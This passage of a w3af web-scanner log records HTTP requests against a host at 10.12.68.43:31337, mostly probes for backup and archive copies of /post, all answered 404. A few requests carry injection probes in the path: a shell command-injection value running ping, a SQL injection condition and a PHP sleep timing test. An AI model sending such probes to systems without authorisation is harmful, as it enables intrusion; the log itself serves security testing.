                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="345">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/Pz6DRpeL HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="346">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="348">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.inc HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.inc&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="861">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="862">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/12+AND+12%3D13+ HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="351">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="864">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/FNNl0x0r HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="354">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.jar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.jar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="355">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="356">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="357">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.java HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.java&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="359">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.properties HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.properties&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="360">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.class HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.class&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="361">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.bak1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="362">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.bkp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bkp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="364">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.bak HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.bak&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="366">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="367">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.backup HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="368">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="370">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
